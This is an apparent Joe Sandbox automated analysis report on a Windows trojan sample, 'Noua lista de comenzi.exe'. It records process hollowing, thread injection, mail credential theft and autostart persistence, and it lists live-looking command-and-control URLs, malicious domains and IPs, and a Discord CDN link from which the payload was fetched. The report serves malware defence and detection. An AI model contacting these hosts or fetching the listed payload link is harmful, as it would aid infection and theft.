          Source: Yara matchFile source: 0000000D.00000000.341556441.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000000.342249677.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.444169115.0000000000D00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000000.460806286.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.443254780.0000000000620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000000.341156257.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000000.443394181.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000002.482010889.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.458795604.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000000.380170641.000000001033D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000000.341917837.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000000.443995537.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000000.442522254.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000000.418077999.000000001033D000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000000.460438010.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000000.461529768.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.480269779.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000000.442878900.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.811786868.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.809884438.00000000000B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.811264852.0000000002C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000000.461169026.0000000072480000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Shared Modules
          11
          Registry Run Keys / Startup Folder
          912
          Process Injection
          1
          Masquerading
          OS Credential Dumping121
          Security Software Discovery
          Remote Services1
          Email Collection
          Exfiltration Over Other Network Medium11
          Encrypted Channel
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default Accounts1
          Exploitation for Client Execution
          1
          DLL Side-Loading
          11
          Registry Run Keys / Startup Folder
          2
          Virtualization/Sandbox Evasion
          LSASS Memory2
          Virtualization/Sandbox Evasion
          Remote Desktop Protocol1
          Archive Collected Data
          Exfiltration Over Bluetooth3
          Ingress Tool Transfer
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)1
          DLL Side-Loading
          912
          Process Injection
          Security Account Manager2
          Process Discovery
          SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration4
          Non-Application Layer Protocol
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
          Deobfuscate/Decode Files or Information
          NTDS1
          Remote System Discovery
          Distributed Component Object ModelInput CaptureScheduled Transfer115
          Application Layer Protocol
          SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script3
          Obfuscated Files or Information
          LSA Secrets1
          File and Directory Discovery
          SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Software Packing
          Cached Domain Credentials13
          System Information Discovery
          VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          Timestomp
          DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
          DLL Side-Loading
          Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 562316 Sample: Noua lista de comenzi.exe Startdate: 28/01/2022 Architecture: WINDOWS Score: 100 47 www.mehfeels.com 2->47 49 www.ahmadfaizlajis.com 2->49 51 3 other IPs or domains 2->51 79 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->79 81 Found malware configuration 2->81 83 Malicious sample detected (through community Yara rule) 2->83 85 5 other signatures 2->85 11 Noua lista de comenzi.exe 1 17 2->11         started        signatures3 process4 dnsIp5 67 cdn.discordapp.com 162.159.134.233, 443, 49743, 49744 CLOUDFLARENETUS United States 11->67 43 C:\Users\user\Contacts\Tdfgwnfyyv.exe, PE32 11->43 dropped 45 C:\Users\...\Tdfgwnfyyv.exe:Zone.Identifier, ASCII 11->45 dropped 111 Creates multiple autostart registry keys 11->111 113 Writes to foreign memory regions 11->113 115 Allocates memory in foreign processes 11->115 117 2 other signatures 11->117 16 DpiScaling.exe 11->16         started        file6 signatures7 process8 signatures9 69 Modifies the context of a thread in another process (thread injection) 16->69 71 Maps a DLL or memory area into another process 16->71 73 Sample uses process hollowing technique 16->73 75 2 other signatures 16->75 19 explorer.exe 6 16->19 injected process10 dnsIp11 53 198.54.117.217, 49825, 80 NAMECHEAP-NETUS United States 19->53 55 www.20dzwww.com 172.120.156.91, 49820, 80 EGIHOSTINGUS United States 19->55 57 30 other IPs or domains 19->57 41 C:\Users\user\AppData\...\6ld01n28q8c.exe, PE32 19->41 dropped 87 System process connects to network (likely due to code injection or exploit) 19->87 89 Benign windows process drops PE files 19->89 91 Performs DNS queries to domains with low reputation 19->91 24 Tdfgwnfyyv.exe 13 19->24         started        28 systray.exe 1 12 19->28         started        30 Tdfgwnfyyv.exe 14 19->30         started        file12 signatures13 process14 dnsIp15 59 162.159.130.233, 443, 49747 CLOUDFLARENETUS United States 24->59 61 cdn.discordapp.com 24->61 93 Machine Learning detection for dropped file 24->93 95 Writes to foreign memory regions 24->95 97 Allocates memory in foreign processes 24->97 32 logagent.exe 24->32         started        99 Tries to steal Mail credentials (via file / registry access) 28->99 101 Creates multiple autostart registry keys 28->101 103 Modifies the context of a thread in another process (thread injection) 28->103 109 2 other signatures 28->109 35 cmd.exe 1 28->35         started        63 192.168.2.1 unknown unknown 30->63 65 cdn.discordapp.com 30->65 105 Creates a thread in another existing process (thread injection) 30->105 107 Injects a PE file into a foreign processes 30->107 37 logagent.exe 30->37         started        signatures16 process17 signatures18 77 Tries to detect virtualization through RDTSC time measurements 32->77 39 conhost.exe 35->39         started        process19

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          Noua lista de comenzi.exe33%VirustotalBrowse
          Noua lista de comenzi.exe100%Joe Sandbox ML
          SourceDetectionScannerLabelLink
          C:\Users\user\Contacts\Tdfgwnfyyv.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\Fg00t0t5x\6ld01n28q8c.exe0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\Fg00t0t5x\6ld01n28q8c.exe0%ReversingLabs
          SourceDetectionScannerLabelLinkDownload
          22.2.logagent.exe.72480000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          25.0.logagent.exe.72480000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          22.0.logagent.exe.72480000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          25.0.logagent.exe.72480000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          13.0.DpiScaling.exe.72480000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          20.2.systray.exe.4ae796c.4.unpack100%AviraTR/Patched.Ren.Gen8Download File
          25.2.logagent.exe.72480000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          22.0.logagent.exe.72480000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          13.0.DpiScaling.exe.72480000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          13.0.DpiScaling.exe.72480000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          13.2.DpiScaling.exe.72480000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          22.0.logagent.exe.72480000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          22.0.logagent.exe.72480000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          25.0.logagent.exe.72480000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          13.0.DpiScaling.exe.72480000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          25.0.logagent.exe.72480000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          20.2.systray.exe.193198.1.unpack100%AviraTR/Patched.Ren.Gen8Download File
          SourceDetectionScannerLabelLink
          www.20dzwww.com0%VirustotalBrowse
          SourceDetectionScannerLabelLink
          http://www.ahmadfaizlajis.com0%Avira URL Cloudsafe
          http://www.bubu3cin.com/euv4/?BXxXk=VDDx94hhTdSNTCzmF9hTsMJmJeW9wjNyCbqxx3PVlc1UBFQ0O06RW6LJ7Dcbeoyo6ajj&x6VPE=5jf8Bvhx90%Avira URL Cloudsafe
          http://www.mehfeels.com/euv4/?BXxXk=QBHbLVxXFBQ8vZs3HYaMEcVKayZ3Jv10zmSp74hjINFs4RkrUT15e8jtDg9xTHBGuf3s&nN6=6lpDqpn0n2Bl9fTP0%Avira URL Cloudsafe
          http://www.cielotherepy.com/euv4/?BXxXk=HPV4Q5EPJeH3saw4EFBeN7zL1ZdIcL1Uj7IqLRyb3oQKdylxfekoquh9Ej8w+ItW/Czf&nN6=6lpDqpn0n2Bl9fTP100%Avira URL Cloudmalware
          http://www.t1uba.com/euv4/?BXxXk=a7oTRd/pafA2z6myMPYHhwtmlIDdFKKQLm2w9Ocm2aQfWI2wtWEKtniCrep29h+E27Ao&x6VPE=5jf8Bvhx90%Avira URL Cloudsafe
          http://www.20dzwww.com/euv4/?x6VPE=5jf8Bvhx9&BXxXk=cWiJLLMFkNIAGeNHPwohgYgPINYIsRPE+G/+VQN9zUpY6o9lKCFsb+tpXVk1tI7skOBU0%Avira URL Cloudsafe
          http://www.pkem.top/euv4/?nN6=6lpDqpn0n2Bl9fTP&BXxXk=rHTt4/gAXbFdLDnVce2ivV2H4joOeuBJUkkeDtonXvza2SG7LjkAPmebStjpTvpYTNdp0%Avira URL Cloudsafe
          http://www.ahmadfaizlajis.com/euv4/100%Avira URL Cloudmalware
          http://www.anniebapartments.com/euv4/?BXxXk=2pA74KfmfI5hbfJaDEWFAi8e35ziQ8w4QN1jZFvj4D6XG6sLMhvt5UuKdjwJiJArEaUB&x6VPE=5jf8Bvhx9100%Avira URL Cloudmalware
          http://www.bestpleasure4u.com/euv4/?nN6=6lpDqpn0n2Bl9fTP&BXxXk=0/dJtH7M4g2rGzhc4ssn0iUTCcnOaabGkVzvgj8FSqwfpf+jwBLQmuE48r3s2Xb3yHtY0%Avira URL Cloudsafe
          http://www.librairie-adrienne.com/euv4/?x6VPE=5jf8Bvhx9&BXxXk=oa9knNpzlYsET7a400NCf8AEb2m6hfIC7IipfrPHZRwez4UH0nI2ep6CPiEzZPUmbJ080%Avira URL Cloudsafe
          http://www.game2plays.com/euv4/?BXxXk=cI3g5knJJqXkP8IW+Xza8klzbxDoXV64MSKEiVzom8B632K++iscclio36YMg8rUOzdW&x6VPE=5jf8Bvhx90%Avira URL Cloudsafe
          http://www.mehfeels.com/euv4/0%Avira URL Cloudsafe
          http://www.alifdanismanlik.com/euv4/?x6VPE=5jf8Bvhx9&BXxXk=TRVfPireTl1Is9Bc/KiHpdfMWo5oXu88iiOyppyrwJSTQqYmoSBf8ZBQ12CtfhZ4Lehs100%Avira URL Cloudmalware
          http://www.bubu3cin.com/euv4/?nN6=6lpDqpn0n2Bl9fTP&BXxXk=VDDx94hhTdSNTCzmF9hTsMJmJeW9wjNyCbqxx3PVlc1UBFQ0O06RW6LJ7Dcbeoyo6ajj0%Avira URL Cloudsafe
          http://www.rematedeldia.com/euv4/?x6VPE=5jf8Bvhx9&BXxXk=E+AdldMsUtuIxZV3GzeilCEOXtaM5yG6oWVR/2hlbhe5LZ2inqV2BFV3XKjv+n3r1qMt100%Avira URL Cloudmalware
          www.rematedeldia.com/euv4/100%Avira URL Cloudmalware
          http://www.the-pumps.com/euv4/?x6VPE=5jf8Bvhx9&BXxXk=HAa1B5AppjYU5aCns58Lm/lX0LPKjP/AouTCOfgyvRhMztBouTXibUsUAqGI4dNLtbsU100%Avira URL Cloudmalware
          http://www.bendyourtongue.com/euv4/?BXxXk=dD0iDvhn43tXR1Irz5moIEmsbBY1tPeSvnURlL34d3R1xCqqo0E9W1015A+nmD7pBEru&x6VPE=5jf8Bvhx9100%Avira URL Cloudmalware
          http://www.handejqr.com/euv4/?x6VPE=5jf8Bvhx9&BXxXk=85mQjwU+wMRs83r0GOSrcIreOiba9zyWW+CS0GLKbh9gHly9YGpiGKD2AN9MIjoCEE7/0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          www.20dzwww.com
          172.120.156.91
          truetrueunknown
          www.bestpleasure4u.com
          34.90.73.145
          truefalse
            unknown
            www.pkem.top
            52.89.53.122
            truetrue
              unknown
              parkingpage.namecheap.com
              198.54.117.215
              truefalse
                high
                cdn.discordapp.com
                162.159.134.233
                truefalse
                  high
                  www.t1uba.com
                  154.90.64.134
                  truefalse
                    high
                    mehfeels.com
                    34.102.136.180
                    truefalse
                      high
                      bendyourtongue.com
                      34.102.136.180
                      truefalse
                        high
                        shops.myshopify.com
                        23.227.38.74
                        truefalse
                          high
                          dns.zhanh.com
                          119.28.141.142
                          truefalse
                            high
                            www.bubu3cin.com
                            162.0.214.189
                            truefalse
                              high
                              librairie-adrienne.com
                              192.0.78.240
                              truefalse
                                high
                                a58e4c82ccde743a88da9ce6c3a75eed-962232103.ap-southeast-1.elb.amazonaws.com
                                3.1.123.15
                                truefalse
                                  high
                                  game2plays.com
                                  162.0.232.169
                                  truefalse
                                    high
                                    www.anniebapartments.com
                                    206.188.193.90
                                    truefalse
                                      high
                                      alifdanismanlik.com
                                      157.90.247.57
                                      truefalse
                                        high
                                        www.alert78.info
                                        unknown
                                        unknownfalse
                                          high
                                          www.ahmadfaizlajis.com
                                          unknown
                                          unknownfalse
                                            high
                                            www.game2plays.com
                                            unknown
                                            unknownfalse
                                              high
                                              www.kreativevisibility.net
                                              unknown
                                              unknownfalse
                                                high
                                                www.awp.email
                                                unknown
                                                unknownfalse
                                                  high
                                                  www.librairie-adrienne.com
                                                  unknown
                                                  unknownfalse
                                                    high
                                                    www.mehfeels.com
                                                    unknown
                                                    unknownfalse
                                                      high
                                                      www.alifdanismanlik.com
                                                      unknown
                                                      unknownfalse
                                                        high
                                                        www.bendyourtongue.com
                                                        unknown
                                                        unknownfalse
                                                          high
                                                          www.handejqr.com
                                                          unknown
                                                          unknownfalse
                                                            high
                                                            www.protection-onepa.com
                                                            unknown
                                                            unknownfalse
                                                              high
                                                              www.fabio.tools
                                                              unknown
                                                              unknownfalse
                                                                high
                                                                www.rematedeldia.com
                                                                unknown
                                                                unknownfalse
                                                                  high
                                                                  www.cielotherepy.com
                                                                  unknown
                                                                  unknownfalse
                                                                    high
                                                                    www.byausorsm26-plala.xyz
                                                                    unknown
                                                                    unknownfalse
                                                                      high
                                                                      www.the-pumps.com
                                                                      unknown
                                                                      unknownfalse
                                                                        high
                                                                        NameMaliciousAntivirus DetectionReputation
                                                                        http://www.bubu3cin.com/euv4/?BXxXk=VDDx94hhTdSNTCzmF9hTsMJmJeW9wjNyCbqxx3PVlc1UBFQ0O06RW6LJ7Dcbeoyo6ajj&x6VPE=5jf8Bvhx9true
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.mehfeels.com/euv4/?BXxXk=QBHbLVxXFBQ8vZs3HYaMEcVKayZ3Jv10zmSp74hjINFs4RkrUT15e8jtDg9xTHBGuf3s&nN6=6lpDqpn0n2Bl9fTPfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.cielotherepy.com/euv4/?BXxXk=HPV4Q5EPJeH3saw4EFBeN7zL1ZdIcL1Uj7IqLRyb3oQKdylxfekoquh9Ej8w+ItW/Czf&nN6=6lpDqpn0n2Bl9fTPtrue
                                                                        • Avira URL Cloud: malware
                                                                        unknown
                                                                        http://www.t1uba.com/euv4/?BXxXk=a7oTRd/pafA2z6myMPYHhwtmlIDdFKKQLm2w9Ocm2aQfWI2wtWEKtniCrep29h+E27Ao&x6VPE=5jf8Bvhx9true
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.20dzwww.com/euv4/?x6VPE=5jf8Bvhx9&BXxXk=cWiJLLMFkNIAGeNHPwohgYgPINYIsRPE+G/+VQN9zUpY6o9lKCFsb+tpXVk1tI7skOBUtrue
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.pkem.top/euv4/?nN6=6lpDqpn0n2Bl9fTP&BXxXk=rHTt4/gAXbFdLDnVce2ivV2H4joOeuBJUkkeDtonXvza2SG7LjkAPmebStjpTvpYTNdptrue
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.anniebapartments.com/euv4/?BXxXk=2pA74KfmfI5hbfJaDEWFAi8e35ziQ8w4QN1jZFvj4D6XG6sLMhvt5UuKdjwJiJArEaUB&x6VPE=5jf8Bvhx9true
                                                                        • Avira URL Cloud: malware
                                                                        unknown
                                                                        http://www.bestpleasure4u.com/euv4/?nN6=6lpDqpn0n2Bl9fTP&BXxXk=0/dJtH7M4g2rGzhc4ssn0iUTCcnOaabGkVzvgj8FSqwfpf+jwBLQmuE48r3s2Xb3yHtYfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.librairie-adrienne.com/euv4/?x6VPE=5jf8Bvhx9&BXxXk=oa9knNpzlYsET7a400NCf8AEb2m6hfIC7IipfrPHZRwez4UH0nI2ep6CPiEzZPUmbJ08true
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.game2plays.com/euv4/?BXxXk=cI3g5knJJqXkP8IW+Xza8klzbxDoXV64MSKEiVzom8B632K++iscclio36YMg8rUOzdW&x6VPE=5jf8Bvhx9true
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.mehfeels.com/euv4/false
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.alifdanismanlik.com/euv4/?x6VPE=5jf8Bvhx9&BXxXk=TRVfPireTl1Is9Bc/KiHpdfMWo5oXu88iiOyppyrwJSTQqYmoSBf8ZBQ12CtfhZ4Lehstrue
                                                                        • Avira URL Cloud: malware
                                                                        unknown
                                                                        http://www.bubu3cin.com/euv4/?nN6=6lpDqpn0n2Bl9fTP&BXxXk=VDDx94hhTdSNTCzmF9hTsMJmJeW9wjNyCbqxx3PVlc1UBFQ0O06RW6LJ7Dcbeoyo6ajjtrue
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.rematedeldia.com/euv4/?x6VPE=5jf8Bvhx9&BXxXk=E+AdldMsUtuIxZV3GzeilCEOXtaM5yG6oWVR/2hlbhe5LZ2inqV2BFV3XKjv+n3r1qMttrue
                                                                        • Avira URL Cloud: malware
                                                                        unknown
                                                                        www.rematedeldia.com/euv4/true
                                                                        • Avira URL Cloud: malware
                                                                        low
                                                                        http://www.the-pumps.com/euv4/?x6VPE=5jf8Bvhx9&BXxXk=HAa1B5AppjYU5aCns58Lm/lX0LPKjP/AouTCOfgyvRhMztBouTXibUsUAqGI4dNLtbsUtrue
                                                                        • Avira URL Cloud: malware
                                                                        unknown
                                                                        https://cdn.discordapp.com/attachments/935207028299796504/936481003038449725/Tdfgwnfyyvslxmhqyfimidqqywchnjifalse
                                                                          high
                                                                          http://www.bendyourtongue.com/euv4/?BXxXk=dD0iDvhn43tXR1Irz5moIEmsbBY1tPeSvnURlL34d3R1xCqqo0E9W1015A+nmD7pBEru&x6VPE=5jf8Bvhx9false
                                                                          • Avira URL Cloud: malware
                                                                          unknown
                                                                          http://www.handejqr.com/euv4/?x6VPE=5jf8Bvhx9&BXxXk=85mQjwU+wMRs83r0GOSrcIreOiba9zyWW+CS0GLKbh9gHly9YGpiGKD2AN9MIjoCEE7/true
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                                          http://www.ahmadfaizlajis.comsystray.exe, 00000014.00000002.813138180.00000000052DB000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://www.google.com/chrome/static/images/favicons/favicon-16x16.pngQcdsystray.exe, 00000014.00000002.810537500.00000000001AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.google.com/chrome/static/images/favicons/favicon-16x16.pngsystray.exe, 00000014.00000002.810537500.00000000001AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.ahmadfaizlajis.com/euv4/systray.exe, 00000014.00000002.813138180.00000000052DB000.00000004.10000000.00040000.00000000.sdmptrue
                                                                              • Avira URL Cloud: malware
                                                                              unknown
                                                                              https://www.google.com/chrome/systray.exe, 00000014.00000002.810537500.00000000001AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=0systray.exe, 00000014.00000002.810537500.00000000001AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://www.msn.com/de-ch/?ocid=iehpsystray.exe, 00000014.00000002.810537500.00000000001AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.msn.com/?ocid=iehpsystray.exe, 00000014.00000002.810537500.00000000001AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://www.msn.com/de-ch/?ocid=iehp3systray.exe, 00000014.00000002.810537500.00000000001AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://www.msn.com/de-ch/ocid=iehpsystray.exe, 00000014.00000002.810537500.00000000001AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://www.msn.com/ocid=iehp141systray.exe, 00000014.00000002.810537500.00000000001AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://www.google.com/chrome/gsystray.exe, 00000014.00000002.810537500.00000000001AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              • No. of IPs < 25%
                                                                                              • 25% < No. of IPs < 50%
                                                                                              • 50% < No. of IPs < 75%
                                                                                              • 75% < No. of IPs
                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                              198.54.117.217
                                                                                              unknownUnited States
                                                                                              22612NAMECHEAP-NETUStrue
                                                                                              162.0.214.189
                                                                                              www.bubu3cin.comCanada
                                                                                              35893ACPCAfalse
                                                                                              23.227.38.74
                                                                                              shops.myshopify.comCanada
                                                                                              13335CLOUDFLARENETUSfalse
                                                                                              52.89.53.122
                                                                                              www.pkem.topUnited States
                                                                                              16509AMAZON-02UStrue
                                                                                              192.0.78.240
                                                                                              librairie-adrienne.comUnited States
                                                                                              2635AUTOMATTICUSfalse
                                                                                              162.159.130.233
                                                                                              unknownUnited States
                                                                                              13335CLOUDFLARENETUSfalse
                                                                                              162.0.232.169
                                                                                              game2plays.comCanada
                                                                                              22612NAMECHEAP-NETUSfalse
                                                                                              119.28.141.142
                                                                                              dns.zhanh.comChina
                                                                                              132203TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNfalse
                                                                                              154.90.64.134
                                                                                              www.t1uba.comSeychelles
                                                                                              134548DXTL-HKDXTLTseungKwanOServiceHKfalse
                                                                                              34.90.73.145
                                                                                              www.bestpleasure4u.comUnited States
                                                                                              15169GOOGLEUSfalse
                                                                                              34.102.136.180
                                                                                              mehfeels.comUnited States
                                                                                              15169GOOGLEUSfalse
                                                                                              157.90.247.57
                                                                                              alifdanismanlik.comUnited States
                                                                                              766REDIRISRedIRISAutonomousSystemESfalse
                                                                                              172.120.156.91
                                                                                              www.20dzwww.comUnited States
                                                                                              18779EGIHOSTINGUStrue
                                                                                              198.54.117.215
                                                                                              parkingpage.namecheap.comUnited States
                                                                                              22612NAMECHEAP-NETUSfalse
                                                                                              206.188.193.90
                                                                                              www.anniebapartments.comUnited States
                                                                                              55002DEFENSE-NETUSfalse
                                                                                              162.159.134.233
                                                                                              cdn.discordapp.comUnited States
                                                                                              13335CLOUDFLARENETUSfalse
                                                                                              IP
                                                                                              192.168.2.1
                                                                                              Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                              Analysis ID:562316
                                                                                              Start date:28.01.2022
                                                                                              Start time:19:01:13
                                                                                              Joe Sandbox Product:CloudBasic
                                                                                              Overall analysis duration:0h 15m 11s
                                                                                              Hypervisor based Inspection enabled:false
                                                                                              Report type:light
                                                                                              Sample file name:Noua lista de comenzi.exe
                                                                                              Cookbook file name:default.jbs
                                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                              Number of analysed new started processes analysed:35
                                                                                              Number of new started drivers analysed:0
                                                                                              Number of existing processes analysed:0
                                                                                              Number of existing drivers analysed:0
                                                                                              Number of injected processes analysed:2
                                                                                              Technologies:
                                                                                              • HCA enabled
                                                                                              • EGA enabled
                                                                                              • HDC enabled
                                                                                              • AMSI enabled
                                                                                              Analysis Mode:default
                                                                                              Analysis stop reason:Timeout
                                                                                              Detection:MAL
                                                                                              Classification:mal100.troj.spyw.evad.winEXE@14/8@26/17
                                                                                              EGA Information:
                                                                                              • Successful, ratio: 40%
                                                                                              HDC Information:
                                                                                              • Successful, ratio: 62.4% (good quality ratio 54.2%)
                                                                                              • Quality average: 71.6%
                                                                                              • Quality standard deviation: 33.5%
                                                                                              HCA Information:
                                                                                              • Successful, ratio: 87%
                                                                                              • Number of executed functions: 0
                                                                                              • Number of non-executed functions: 0
                                                                                              Cookbook Comments:
                                                                                              • Adjust boot time
                                                                                              • Enable AMSI
                                                                                              • Found application associated with file extension: .exe
                                                                                              • Override analysis time to 240s for sample files taking high CPU consumption
                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, dllhost.exe, BackgroundTransferHost.exe, consent.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                              • TCP Packets have been reduced to 100
                                                                                              • Excluded IPs from analysis (whitelisted): 152.199.19.161, 51.104.136.2, 20.49.150.241, 40.127.240.158
                                                                                              • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, onecs-live.ec.azureedge.net, onecs-live.azureedge.net, myweb.propertyguru.com.my.cdn.cloudflare.net, ctldl.windowsupdate.com, settings-win.data.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, cs9.wpc.v0cdn.net, settingsfd-geo.trafficmanager.net
                                                                                              • Execution Graph export aborted for target Noua lista de comenzi.exe, PID 6848 because there are no executed function
                                                                                              • Execution Graph export aborted for target Tdfgwnfyyv.exe, PID 1840 because there are no executed function
                                                                                              • Execution Graph export aborted for target Tdfgwnfyyv.exe, PID 6780 because there are no executed function
                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                              TimeTypeDescription
                                                                                              19:02:06API Interceptor1x Sleep call for process: Noua lista de comenzi.exe modified
                                                                                              19:02:33AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Tdfgwnfyyv C:\Users\user\Contacts\vyyfnwgfdT.url
